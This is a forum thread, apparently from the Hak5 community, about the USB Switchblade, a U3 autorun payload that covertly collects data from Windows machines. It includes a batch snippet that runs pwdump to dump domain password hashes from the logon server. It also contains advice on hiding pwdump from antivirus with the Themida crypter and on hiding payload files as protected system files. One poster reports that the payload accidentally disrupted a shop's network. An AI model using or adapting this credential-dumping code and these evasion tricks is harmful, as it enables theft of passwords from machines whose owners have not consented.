
USB Switchblade Development


Darren Kitchen


  • 2 weeks later...

New here and have been reading the posts, but I can't find an answer to a question that was asked earlier in this forum.

Question: I am interested in trying the payload, but would like to know: if I try one of the payloads, can I load my U3 options back if I choose to go back to the original settings for my U3 drive?

Thanks


I THINK with all of them you just back up the drive before you start, and when you want to change the drive back to normal U3, just replace the backup you made, delete the launchpad .iso file and run the updater again, and it should update from the internet.

But I might be wrong about this, and you should get a second opinion.


  • 2 weeks later...

A few of you may find this handy. I made this little routine for the end of my batch file. It time- and date-stamps the log file. I had to tinker around with a few other aspects of the original go.cmd file in order to get it to work right. If you have issues, let me know and I'll post my whole bat.

if not exist documents\logfiles\temp md documents\logfiles\temp
move Documents\logfiles\%computername%_load.log Documents\logfiles\temp
FOR /F "usebackq tokens=1" %%n IN (`dir Documents\logfiles\temp /b`) DO @FOR /F "usebackq tokens=2,3,4 delims=/ " %%d IN (`date /t`) DO @FOR /F "usebackq tokens=1,2 delims=: " %%t IN (`time /t`) DO @ren Documents\logfiles\temp\%%n %computername%-%%d%%e%%f-%%t%%u.log
move Documents\logfiles\temp\* Documents\logfiles
rd Documents\logfiles\temp


Here's another little mod. Not too glamorous, but handy. This will check to see if the user is logged on to a domain server. If so, pwdump will run against the logon server and dump the PWs from there. This will ONLY work if the logged-on user has Domain Admin rights. If the user does not have these rights, the attempt will fail and WILL generate an event in the Security Log of the server. Also, I recommend using PWDump6 to avoid LSASS errors on the server. I have had LSASS crashes in my lab with previous PWDump versions, but never with v6. Use with care.

@echo ==================================================[Dump Server SAM] >> Documents\logfiles\%computername%_load.log 2>&1
@if not %LOGONSERVER%==%COMPUTERNAME% .\pwdump %LOGONSERVER% >> Documents\logfiles\%computername%_load.log 2>&1
@if %LOGONSERVER%==%COMPUTERNAME% @echo Logged on to local machine.  Process skipped. >> Documents\logfiles\%computername%_load.log 2>&1
@echo ==================================================[Dump END Server SAM] >> Documents\logfiles\%computername%_load.log 2>&1


Themida / Oreans Technologies

Maybe this is what was used to goof the file sigs for pwdump.

I am running the encrypted version from the site. I can't recall the author's name, sorry.

It only happens on the testtop.

I am currently tweaking the payload for assessment purposes.

I plan to have a second set of files to reverse everything left by Switchblade.

Maybe a second usb stick in the future.....

One to exploit and one to clean up the mess......

Red or Blue pill? :)

If I come up with anything interesting, I will be sure to share.

great site!!!!!

Plenty of projects to play with here ;) 8)


Just to let you guys know, I was a noob and plugged in my drive at work without thinking (as I usually use Windows XP, which asks if you want to open the folder, as it's non-U3), and it was a Windows 2000 machine. Switchblade ran automatically, and folding@home slowed the network down to a crawl. We spent days, even after running the antidote, trying to fix it, and since it was a computer shop/netcafe it didn't go down well. So, just letting you guys know.


  • 3 weeks later...
I installed the maxdamage payload, but Trend Micro is detecting a Trojan.Rootkit when it runs: %windir%/system32/oreans.sys

Anybody else get this?

As mentioned above, Themida, which uses the oreans.sys file, is what is used to make pwdump get past anti-virus programs. There are other crypters for files that don't rely on external DLLs like that, but eventually these things get detected by the anti-virus vendors.

http://www.oreans.com/


  • 3 weeks later...

Hey everyone, this is my first post here. I just got a U3 Kingston drive, and I'm trying to run the Max Damage technique. On the Wiki it says that if I don't have a SanDisk or Memorex U3 drive, I need to download the U3 LaunchPad Hacker. I tried to download it, but the link was broken. What should I do? Can someone please help me? Thanks a lot, guys.


  • 3 weeks later...

On my switchblade, on about 1/2 the computers I plug it into I get a "drive not found/detected" or similar error with a continue/retry/cancel option. I have this error on both the VBS-based U3 launcher and the batch-file-based launcher (the one that is on the CD partition and searches for the USB partition).

Any ideas why this is? It's not very anonymous when it does that.


^ It appears that what is happening is that the CD-ROM partition of U3 takes the first available drive letter (G in this case) while the flash partition tries to take the next letter (H). However, in the network I'm on, there is an H drive already there! Going into the management console -> disk manager I can locate the flash partition and give it a different drive letter, but this defeats the automation!! Is there a way to get the flash drive to just take the next available letter and not try to force the next letter from the CD-ROM?


Same problem happens for me as it does for twist3r. The CDROM portion shows up, but the flash drive isn't available unless settings are changed. Any ideas on how to change the letter assignment automatically? (It's a U3 problem).

One other thing that's half related:

How do you make files not just "hidden", but into "protected operating system files"?

That way, it's a little harder to make any of them visible, and they still run. I've managed to make folders that are protected by copying the RECYCLER folder, but I'm not sure how to change that on individual files. Any help?


  • 3 weeks later...
  • 2 weeks later...
  • 1 month later...

Hey.

I've bought a 4 GB Toshiba U3 drive. I've wanted to try Switchblade, but it seems that the HAK5 wiki is down?!?

So maybe anyone could upload a zip package on a filehoster or PM me for email?

Thx

Obi-Wahn


Yeah, I'm hoping it comes back soon too... I want to try this out...

I like what the latest episode has for USB trickery (2x10), going to rewatch it tonight at work when things get quiet..

on a side note, has anyone heard anything about this little device? http://www.subrosasoft.com/OSXSoftware/ind...products_id=195 (probably a dumb question)..

now I haven't read through the 25 pages of this thread yet, so I apologize for a repost, but I'm curious as to how similar/different it is from the ongoing project here..  perhaps a future implementation into this project?

EDIT - I went on Google and found this link... its reference is HAK5, and it has all the USB hacks on it... here's the one for the switchblade:

http://www.usbhacks.com/2006/10/07/usb-switchblade/

Edit #2 - so the loader works, and the ISO works, but they don't include the payload for the regular partition of the drive... so I guess I'll have to keep waiting... I don't know how to use the code... such a n00b...
